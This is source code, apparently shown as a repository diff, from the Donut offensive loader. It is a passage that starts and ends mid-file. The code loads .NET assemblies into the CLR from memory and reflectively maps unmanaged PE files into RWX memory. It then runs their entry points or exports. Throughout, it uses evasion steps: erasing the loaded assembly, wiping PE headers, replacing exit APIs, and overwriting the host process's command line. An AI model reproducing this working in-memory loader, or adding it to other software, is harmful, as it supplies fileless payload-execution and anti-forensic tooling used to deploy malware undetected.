3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL LoadAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
32 HRESULT hr = S_OK;
33 BSTR domain;
34 SAFEARRAYBOUND sab;
35 SAFEARRAY *sa;
36 DWORD i;
37 BOOL loaded=FALSE, loadable;
38 PBYTE p;
39 WCHAR buf[DONUT_MAX_NAME];
40
41 if(inst->api.CLRCreateInstance != NULL) {
42 DPRINT("CLRCreateInstance");
43
44 hr = inst->api.CLRCreateInstance(
45 (REFCLSID)&inst->xCLSID_CLRMetaHost,
46 (REFIID)&inst->xIID_ICLRMetaHost,
47 (LPVOID*)&pa->icmh);
48
49 if(SUCCEEDED(hr)) {
50 DPRINT("ICLRMetaHost::GetRuntime(\"%s\")", mod->runtime);
51 ansi2unicode(inst, mod->runtime, buf);
52
53 hr = pa->icmh->lpVtbl->GetRuntime(
54 pa->icmh, buf,
55 (REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
56
57 if(SUCCEEDED(hr)) {
58 DPRINT("ICLRRuntimeInfo::IsLoadable");
59 hr = pa->icri->lpVtbl->IsLoadable(pa->icri, &loadable);
60
61 if(SUCCEEDED(hr) && loadable) {
62 DPRINT("ICLRRuntimeInfo::GetInterface");
63
64 hr = pa->icri->lpVtbl->GetInterface(
65 pa->icri,
66 (REFCLSID)&inst->xCLSID_CorRuntimeHost,
67 (REFIID)&inst->xIID_ICorRuntimeHost,
68 (LPVOID)&pa->icrh);
69
70 DPRINT("HRESULT: %08lx", hr);
71 }
72 } else pa->icri = NULL;
73 } else pa->icmh = NULL;
74 }
75 if(FAILED(hr)) {
76 DPRINT("CLRCreateInstance failed. Trying CorBindToRuntime");
77
78 hr = inst->api.CorBindToRuntime(
79 NULL, // load whatever's available
80 NULL, // load workstation build
81 &inst->xCLSID_CorRuntimeHost,
82 &inst->xIID_ICorRuntimeHost,
83 (LPVOID*)&pa->icrh);
84
85 DPRINT("HRESULT: %08lx", hr);
86 }
87
88 if(FAILED(hr)) {
89 pa->icrh = NULL;
90 return FALSE;
91 }
92 DPRINT("ICorRuntimeHost::Start");
93
94 hr = pa->icrh->lpVtbl->Start(pa->icrh);
95
96 if(SUCCEEDED(hr)) {
97 DPRINT("Domain is %s", mod->domain);
98 ansi2unicode(inst, mod->domain, buf);
99 domain = inst->api.SysAllocString(buf);
100
101 DPRINT("ICorRuntimeHost::CreateDomain(\"%ws\")", buf);
102
103 hr = pa->icrh->lpVtbl->CreateDomain(
104 pa->icrh, domain, NULL, &pa->iu);
105
106 inst->api.SysFreeString(domain);
107
108 if(SUCCEEDED(hr)) {
109 DPRINT("IUnknown::QueryInterface");
110
111 hr = pa->iu->lpVtbl->QueryInterface(
112 pa->iu, (REFIID)&inst->xIID_AppDomain, (LPVOID)&pa->ad);
113
114 if(SUCCEEDED(hr)) {
115 sab.lLbound = 0;
116 sab.cElements = mod->len;
117 sa = inst->api.SafeArrayCreate(VT_UI1, 1, &sab);
118
119 if(sa != NULL) {
120 DPRINT("Copying %" PRIi32 " bytes of assembly to safe array", mod->len);
121
122 for(i=0, p=sa->pvData; i<mod->len; i++) {
123 p[i] = mod->data[i];
124 }
125
126 DPRINT("AppDomain::Load_3");
127
128 hr = pa->ad->lpVtbl->Load_3(
129 pa->ad, sa, &pa->as);
130
131 loaded = hr == S_OK;
132
133 DPRINT("HRESULT : %08lx", hr);
134
135 DPRINT("Erasing assembly from memory");
136
137 for(i=0, p=sa->pvData; i<mod->len; i++) {
138 p[i] = mod->data[i] = 0;
139 }
140
141 DPRINT("SafeArrayDestroy");
142 inst->api.SafeArrayDestroy(sa);
143 }
144 }
145 }
146 }
147 return loaded;
148 }
149
150 BOOL RunAssembly(PDONUT_INSTANCE inst, PDONUT_MODULE mod, PDONUT_ASSEMBLY pa) {
151 SAFEARRAY *sav=NULL, *args=NULL;
152 VARIANT arg, ret, vtPsa, v1={0}, v2;
153 DWORD i;
154 HRESULT hr;
155 BSTR cls, method;
156 ULONG cnt;
157 OLECHAR str[1]={0};
158 LONG ucnt, lcnt;
159 WCHAR **argv, buf[DONUT_MAX_NAME+1];
160 int argc;
161
162 DPRINT("Type is %s",
163 mod->type == DONUT_MODULE_NET_DLL ? "DLL" : "EXE");
164
165 // if this is a program
166 if(mod->type == DONUT_MODULE_NET_EXE) {
167 // get the entrypoint
168 DPRINT("MethodInfo::EntryPoint");
169 hr = pa->as->lpVtbl->EntryPoint(pa->as, &pa->mi);
170
171 if(SUCCEEDED(hr)) {
172 // get the parameters for entrypoint
173 DPRINT("MethodInfo::GetParameters");
174 hr = pa->mi->lpVtbl->GetParameters(pa->mi, &args);
175
176 if(SUCCEEDED(hr)) {
177 DPRINT("SafeArrayGetLBound");
178 hr = inst->api.SafeArrayGetLBound(args, 1, &lcnt);
179
180 DPRINT("SafeArrayGetUBound");
181 hr = inst->api.SafeArrayGetUBound(args, 1, &ucnt);
182 cnt = ucnt - lcnt + 1;
183 DPRINT("Number of parameters for entrypoint : %i", cnt);
184
185 // does Main require string[] args?
186 if(cnt != 0) {
187 // create a 1 dimensional array for Main parameters
188 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, 1);
189 // if user specified their own parameters, add to string array
190 if(mod->param[0] != 0) {
191 ansi2unicode(inst, mod->param, buf);
192 argv = inst->api.CommandLineToArgvW(buf, &argc);
193 // create 1 dimensional array for strings[] args
194 vtPsa.vt = (VT_ARRAY | VT_BSTR);
195 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, argc);
196
197 // add each string parameter
198 for(i=0; i<argc; i++) {
199 DPRINT("Adding \"%ws\" as parameter %i", argv[i], (i + 1));
200 inst->api.SafeArrayPutElement(vtPsa.parray,
201 &i, inst->api.SysAllocString(argv[i]));
202 }
203 } else {
204 DPRINT("Adding empty string for invoke_3");
205 // add empty string to make it work
206 // create 1 dimensional array for strings[] args
207 vtPsa.vt = (VT_ARRAY | VT_BSTR);
208 vtPsa.parray = inst->api.SafeArrayCreateVector(VT_BSTR, 0, 1);
209
210 i=0;
211 inst->api.SafeArrayPutElement(vtPsa.parray,
212 &i, inst->api.SysAllocString(str));
213 }
214 // add string array to list of parameters
215 i=0;
216 inst->api.SafeArrayPutElement(sav, &i, &vtPsa);
217 }
218 v1.vt = VT_NULL;
219 v1.plVal = NULL;
220
221 DPRINT("MethodInfo::Invoke_3()\n");
222
223 hr = pa->mi->lpVtbl->Invoke_3(pa->mi, v1, sav, &v2);
224
225 DPRINT("MethodInfo::Invoke_3 : %08lx : %s",
226 hr, SUCCEEDED(hr) ? "Success" : "Failed");
227
228 if(sav != NULL) {
229 inst->api.SafeArrayDestroy(vtPsa.parray);
230 inst->api.SafeArrayDestroy(sav);
231 }
232 }
233 } else pa->mi = NULL;
234 } else {
235 ansi2unicode(inst, mod->cls, buf);
236 cls = inst->api.SysAllocString(buf);
237 if(cls == NULL) return FALSE;
238 DPRINT("Class: SysAllocString(\"%ws\")", buf);
239
240 ansi2unicode(inst, mod->method, buf);
241 method = inst->api.SysAllocString(buf);
242 DPRINT("Method: SysAllocString(\"%ws\")", buf);
243
244 if(method != NULL) {
245 DPRINT("Assembly::GetType_2");
246 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
247
248 if(SUCCEEDED(hr)) {
249 sav = NULL;
250 DPRINT("Parameters: %s", mod->param);
251
252 if(mod->param[0] != 0) {
253 ansi2unicode(inst, mod->param, buf);
254 argv = inst->api.CommandLineToArgvW(buf, &argc);
255 DPRINT("SafeArrayCreateVector(%li argument(s))", argc);
256
257 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, argc);
258
259 if(sav != NULL) {
260 for(i=0; i<argc; i++) {
261 DPRINT("Adding \"%ws\" as argument %i", argv[i], (i+1));
262
263 V_BSTR(&arg) = inst->api.SysAllocString(argv[i]);
264 V_VT(&arg) = VT_BSTR;
265
266 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
267
268 if(FAILED(hr)) {
269 DPRINT("SafeArrayPutElement failed.");
270 inst->api.SafeArrayDestroy(sav);
271 sav = NULL;
272 }
273 }
274 }
275 }
276 if(SUCCEEDED(hr)) {
277 DPRINT("Calling Type::InvokeMember_3");
278
279 hr = pa->type->lpVtbl->InvokeMember_3(
280 pa->type,
281 method, // name of method
282 BindingFlags_InvokeMethod |
283 BindingFlags_Static |
284 BindingFlags_Public,
285 NULL,
286 v1, // empty VARIANT
287 sav, // arguments to method
288 &ret); // return code from method
289
290 DPRINT("Type::InvokeMember_3 : %08lx : %s",
291 hr, SUCCEEDED(hr) ? "Success" : "Failed");
292
293 if(sav != NULL) {
294 inst->api.SafeArrayDestroy(sav);
295 }
296 }
297 }
298 inst->api.SysFreeString(method);
299 }
300 inst->api.SysFreeString(cls);
301 }
302 return TRUE;
303 }
304
305 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
306
307 if(pa->type != NULL) {
308 DPRINT("Type::Release");
309 pa->type->lpVtbl->Release(pa->type);
310 pa->type = NULL;
311 }
312
313 if(pa->mi != NULL) {
314 DPRINT("MethodInfo::Release");
315 pa->mi->lpVtbl->Release(pa->mi);
316 pa->mi = NULL;
317 }
318
319 if(pa->as != NULL) {
320 DPRINT("Assembly::Release");
321 pa->as->lpVtbl->Release(pa->as);
322 pa->as = NULL;
323 }
324
325 if(pa->ad != NULL) {
326 DPRINT("AppDomain::Release");
327 pa->ad->lpVtbl->Release(pa->ad);
328 pa->ad = NULL;
329 }
330
331 if(pa->iu != NULL) {
332 DPRINT("IUnknown::Release");
333 pa->iu->lpVtbl->Release(pa->iu);
334 pa->iu = NULL;
335 }
336
337 if(pa->icrh != NULL) {
338 DPRINT("ICorRuntimeHost::Stop");
339 pa->icrh->lpVtbl->Stop(pa->icrh);
340
341 DPRINT("ICorRuntimeHost::Release");
342 pa->icrh->lpVtbl->Release(pa->icrh);
343 pa->icrh = NULL;
344 }
345
346 if(pa->icri != NULL) {
347 DPRINT("ICLRRuntimeInfo::Release");
348 pa->icri->lpVtbl->Release(pa->icri);
349 pa->icri = NULL;
350 }
351
352 if(pa->icmh != NULL) {
353 DPRINT("ICLRMetaHost::Release");
354 pa->icmh->lpVtbl->Release(pa->icmh);
355 pa->icmh = NULL;
356 }
357 }
+547
-0
loader/inmem_pe.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(PPEB);
44 typedef VOID (WINAPI *DllParam_t)(PVOID);
45 typedef VOID (WINAPI *DllVoid_t)(VOID);
46
47 // for setting the command line...
48 typedef CHAR** (WINAPI *p_acmdln_t)(VOID);
49 typedef WCHAR** (WINAPI *p_wcmdln_t)(VOID);
50
51 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR NewCommandLine);
52 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name);
53
54 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
55 VOID RunPE(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
56 PIMAGE_DOS_HEADER dos, doshost;
57 PIMAGE_NT_HEADERS nt, nthost;
58 PIMAGE_SECTION_HEADER sh;
59 PIMAGE_THUNK_DATA oft, ft;
60 PIMAGE_IMPORT_BY_NAME ibn;
61 PIMAGE_IMPORT_DESCRIPTOR imp;
62 PIMAGE_DELAYLOAD_DESCRIPTOR del;
63 PIMAGE_EXPORT_DIRECTORY exp;
64 PIMAGE_TLS_DIRECTORY tls;
65 PIMAGE_TLS_CALLBACK *callbacks;
66 PIMAGE_RELOC list;
67 PIMAGE_BASE_RELOCATION ibr;
68 DWORD rva;
69 PDWORD adr;
70 PDWORD sym;
71 PWORD ord;
72 PBYTE ofs;
73 PCHAR str, name;
74 HMODULE dll;
75 ULONG_PTR ptr;
76 DllMain_t DllMain; // DLL
77 Start_t Start; // EXE
78 DllParam_t DllParam = NULL; // DLL function accepting one string parameter
79 DllVoid_t DllVoid = NULL; // DLL function that accepts no parametersd
80 LPVOID cs = NULL, base, host;
81 DWORD i, cnt;
82 HANDLE hThread;
83 WCHAR buf[DONUT_MAX_NAME+1];
84 DWORD size_of_img;
85
86 base = mod->data;
87 dos = (PIMAGE_DOS_HEADER)base;
88 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
89
90 // before doing anything. check compatibility between exe/dll and host process.
91 host = inst->api.GetModuleHandle(NULL);
92 doshost = (PIMAGE_DOS_HEADER)host;
93 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
94
95 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
96 DPRINT("Host process %08lx and file %08lx are not compatible...cannot load.",
97 nthost->FileHeader.Machine, nt->FileHeader.Machine);
98 return;
99 }
100
101 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
102 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
103
104 cs = inst->api.VirtualAlloc(
105 NULL, nt->OptionalHeader.SizeOfImage + 4096,
106 MEM_COMMIT | MEM_RESERVE,
107 PAGE_EXECUTE_READWRITE);
108
109 if(cs == NULL) return;
110
111 DPRINT("Copying Headers");
112 Memcpy(cs, base, nt->OptionalHeader.SizeOfHeaders);
113
114 DPRINT("Copying each section to RWX memory %p", cs);
115 sh = IMAGE_FIRST_SECTION(nt);
116
117 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
118 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
119 (PBYTE)base + sh[i].PointerToRawData,
120 sh[i].SizeOfRawData);
121 }
122
123 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
124
125 if(rva != 0) {
126 DPRINT("Applying Relocations");
127
128 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
129 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
130
131 while(ibr->VirtualAddress != 0) {
132 list = (PIMAGE_RELOC)(ibr + 1);
133
134 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
135 if(list->type == IMAGE_REL_TYPE) {
136 *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
137 } else if(list->type != IMAGE_REL_BASED_ABSOLUTE) {
138 DPRINT("ERROR: Unrecognized Relocation type %08lx.", list->type);
139 goto pe_cleanup;
140 }
141 list++;
142 }
143 ibr = (PIMAGE_BASE_RELOCATION)list;
144 }
145 }
146
147 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
148
149 if(rva != 0) {
150 DPRINT("Processing the Import Table");
151
152 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
153
154 // For each DLL
155 for (;imp->Name!=0; imp++) {
156 name = RVA2VA(PCHAR, cs, imp->Name);
157
158 DPRINT("Loading %s", name);
159 dll = inst->api.LoadLibraryA(name);
160
161 // Resolve the API for this library
162 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
163 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
164
165 // For each API
166 for (;; oft++, ft++) {
167 // No API left?
168 if (oft->u1.AddressOfData == 0) break;
169
170 // Resolve by ordinal?
171 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
172 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
173 } else {
174 // Resolve by name
175 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
176
177 // run entrypoint as thread?
178 if(mod->thread != 0) {
179 // if this is an exit-related API, replace it with RtlExitUserThread
180 if(IsExitAPI(inst, ibn->Name)) {
181 DPRINT("Replacing %s!%s with ntdll!RtlExitUserThread", name, ibn->Name);
182 ft->u1.Function = (ULONG_PTR)inst->api.RtlExitUserThread;
183 continue;
184 }
185 }
186 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
187 }
188 }
189 }
190 }
191
192 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress;
193
194 if(rva != 0) {
195 DPRINT("Processing Delayed Import Table");
196
197 del = RVA2VA(PIMAGE_DELAYLOAD_DESCRIPTOR, cs, rva);
198
199 // For each DLL
200 for (;del->DllNameRVA != 0; del++) {
201 name = RVA2VA(PCHAR, cs, del->DllNameRVA);
202
203 DPRINT("Loading %s", name);
204 dll = inst->api.LoadLibraryA(name);
205
206 if(dll == NULL) continue;
207
208 // Resolve the API for this library
209 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportNameTableRVA);
210 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportAddressTableRVA);
211
212 // For each API
213 for (;; oft++, ft++) {
214 // No API left?
215 if (oft->u1.AddressOfData == 0) break;
216
217 // Resolve by ordinal?
218 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
219 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
220 } else {
221 // Resolve by name
222 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
223 ft->u1.Function = (ULONG_PTR)inst->api.GetProcAddress(dll, ibn->Name);
224 }
225 }
226 }
227 }
228
229 /**
230 Execute TLS callbacks. These are only called when the process starts, not when a thread begins, ends
231 or when the process ends. TLS is not fully supported.
232 */
233 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress;
234 if(rva != 0) {
235 DPRINT("Processing TLS directory");
236
237 tls = RVA2VA(PIMAGE_TLS_DIRECTORY, cs, rva);
238
239 // address of callbacks is absolute. requires relocation information
240 callbacks = (PIMAGE_TLS_CALLBACK*)tls->AddressOfCallBacks;
241 DPRINT("AddressOfCallBacks : %p", callbacks);
242
243 // DebugBreak();
244
245 if(callbacks) {
246 while(*callbacks != NULL) {
247 // call function
248 DPRINT("Calling %p", *callbacks);
249 (*callbacks)((LPVOID)cs, DLL_PROCESS_ATTACH, NULL);
250 callbacks++;
251 }
252 }
253 }
254
255 size_of_img = nt->OptionalHeader.SizeOfImage;
256 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
257
258 if(mod->type == DONUT_MODULE_DLL) {
259 DPRINT("Executing entrypoint of DLL\n\n");
260 DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
261 DllMain(host, DLL_PROCESS_ATTACH, NULL);
262
263 // call exported api?
264 if(mod->method[0] != 0) {
265 DPRINT("Resolving address of %s", (char*)mod->method);
266
267 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
268
269 if(rva != 0) {
270 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
271 cnt = exp->NumberOfNames;
272
273 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
274
275 if(cnt != 0) {
276 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
277 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
278 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
279
280 do {
281 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
282 if(!_strcmp(str, mod->method)) {
283 DllParam = RVA2VA(DllParam_t, cs, adr[ord[cnt-1]]);
284 break;
285 }
286 } while (--cnt);
287
288 DPRINT("Wiping Headers from memory");
289 Memset(cs, 0, nt->OptionalHeader.SizeOfHeaders);
290 Memset(base, 0, nt->OptionalHeader.SizeOfHeaders);
291
292 // resolved okay?
293 if(DllParam != NULL) {
294 DPRINT("Invoking %s", mod->method);
295 // pass parameters/command line to function?
296 if(mod->param[0] != 0) {
297 if(mod->unicode) {
298 ansi2unicode(inst, mod->param, buf);
299 }
300 DllParam((mod->unicode) ? (PVOID)buf : (PVOID)mod->param);
301 } else {
302 // execute DLL function with no parameters
303 DllVoid = (DllVoid_t)DllParam;
304 DllVoid();
305 }
306 } else {
307 DPRINT("Unable to resolve API");
308 goto pe_cleanup;
309 }
310 }
311 }
312 }
313 } else {
314
315 // set the command line
316 if(mod->param[0] != 0) {
317 ansi2unicode(inst, mod->param, buf);
318 DPRINT("Setting command line: %ws", buf);
319 SetCommandLineW(inst, buf);
320 }
321
322 DPRINT("Wiping Headers from memory");
323 Memset(cs, 0, nt->OptionalHeader.SizeOfHeaders);
324 Memset(base, 0, nt->OptionalHeader.SizeOfHeaders);
325
326 if(mod->thread != 0) {
327 // Create a new thread for this process.
328 // Since we replaced exit-related API with RtlExitUserThread in IAT, once an exit-related API is called, the
329 // thread will simply terminate and return back here. Of course, this doesn't work
330 // if the exit-related API is resolved dynamically.
331 DPRINT("Creating thread for entrypoint of EXE : %p\n\n", (PVOID)Start);
332 hThread = inst->api.CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Start, NULL, 0, NULL);
333
334 if(hThread != NULL) {
335 // wait for thread to terminate
336 inst->api.WaitForSingleObject(hThread, INFINITE);
337 DPRINT("Process terminated");
338 }
339 } else {
340 // if ExitProces is called, this will terminate the host process.
341 DPRINT("Executing entrypoint");
342 Start(NtCurrentTeb()->ProcessEnvironmentBlock);
343 }
344 }
345 pe_cleanup:
346 // if memory allocated
347 if(cs != NULL) {
348 // release
349 DPRINT("Releasing memory");
350 inst->api.VirtualFree(cs, 0, MEM_DECOMMIT | MEM_RELEASE);
351 }
352 }
353
354 // check each exit-related api with name provided
355 // return TRUE if found, else FALSE
356 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name) {
357 PCHAR str;
358 CHAR api[128];
359 INT i;
360
361 str = inst->exit_api;
362
363 for(;;) {
364 // store string until null byte or semi-colon encountered
365 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) api[i] = str[i];
366 // nothing stored? end
367 if(i == 0) break;
368 // skip name plus one for separator
369 str += (i + 1);
370 // store null terminator
371 api[i] = '\0';
372 // if equal, return TRUE
373 if(!_strcmp(api, name)) return TRUE;
374 }
375 return FALSE;
376 }
377
378 // returns TRUE if ptr is heap memory
379 BOOL IsHeapPtr(PDONUT_INSTANCE inst, LPVOID ptr) {
380 MEMORY_BASIC_INFORMATION mbi;
381 DWORD res;
382
383 if(ptr == NULL) return FALSE;
384
385 // query the pointer
386 res = inst->api.VirtualQuery(ptr, &mbi, sizeof(mbi));
387 if(res != sizeof(mbi)) return FALSE;
388
389 return ((mbi.State == MEM_COMMIT ) &&
390 (mbi.Type == MEM_PRIVATE ) &&
391 (mbi.Protect == PAGE_READWRITE));
392 }
393
394 // Set the command line for host process.
395 //
396 // This replaces kernelbase!BaseUnicodeCommandLine and kernelbase!BaseAnsiCommandLine
397 // that kernelbase!KernelBaseDllInitialize reads from NtCurrentPeb()->ProcessParameters->CommandLine
398 //
399 // BOOL KernelBaseDllInitialize(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
400 //
401 // Only tested on windows 10, but should work with at least windows 7
402 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR CommandLine) {
403 PIMAGE_DOS_HEADER dos;
404 PIMAGE_NT_HEADERS nt;
405 PIMAGE_SECTION_HEADER sh;
406 DWORD i, cnt;
407 PULONG_PTR ds;
408 HMODULE m;
409 ANSI_STRING ansi;
410 PANSI_STRING mbs;
411 PUNICODE_STRING wcs;
412 PPEB peb;
413 PPEB_LDR_DATA ldr;
414 PLDR_DATA_TABLE_ENTRY dte;
415 PRTL_USER_PROCESS_PARAMETERS upp;
416 BOOL bSet = FALSE;
417 CHAR **argv;
418 WCHAR **wargv;
419 p_acmdln_t p_acmdln;
420 p_wcmdln_t p_wcmdln;
421 CHAR sym[128];
422 PCHAR str;
423 INT fptr, atype;
424 PVOID addr;
425
426 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
427 upp = peb->ProcessParameters;
428
429 DPRINT("Obtaining handle for %s", inst->kernelbase);
430 m = inst->api.GetModuleHandle(inst->kernelbase);
431 dos = (PIMAGE_DOS_HEADER)m;
432 nt = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);
433 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
434 nt->FileHeader.SizeOfOptionalHeader);
435
436 // locate the .data segment, save VA and number of pointers
437 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
438 if(*(PDWORD)sh[i].Name == *(PDWORD)inst->dataname) {
439 ds = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
440 cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
441 break;
442 }
443 }
444
445 DPRINT("Searching %i pointers", cnt);
446
447 // for each pointer
448 for(i=0; i<cnt; i++) {
449 wcs = (PUNICODE_STRING)&ds[i];
450 // skip if buffer doesn't point to heap memory
451 if(!IsHeapPtr(inst, wcs->Buffer)) continue;
452 // skip if not equal
453 if(!inst->api.RtlEqualUnicodeString(&upp->CommandLine, wcs, TRUE)) continue;
454 DPRINT("BaseUnicodeCommandLine at %p : %ws", &ds[i], wcs->Buffer);
455 // convert command line to ansi
456 inst->api.RtlUnicodeStringToAnsiString(&ansi, &upp->CommandLine, TRUE);
457 // overwrite the existing command line for GetCommandLineW
458 inst->api.RtlCreateUnicodeString(wcs, CommandLine);
459 // and the one in PEB (disabled for now as it's not required)
460 //inst->api.RtlCreateUnicodeString(&upp->CommandLine, CommandLine);
461
462 DPRINT("New BaseUnicodeCommandLine at %p : %ws", &ds[i], GetCommandLineW());
463 bSet = TRUE;
464 break;
465 }
466
467 if(!bSet) return FALSE;
468
469 // for each pointer
470 for(i=0; i<cnt; i++) {
471 mbs = (PANSI_STRING)&ds[i];
472 // skip if buffer doesn't point to heap memory
473 if(!IsHeapPtr(inst, mbs->Buffer)) continue;
474 // skip if not equal
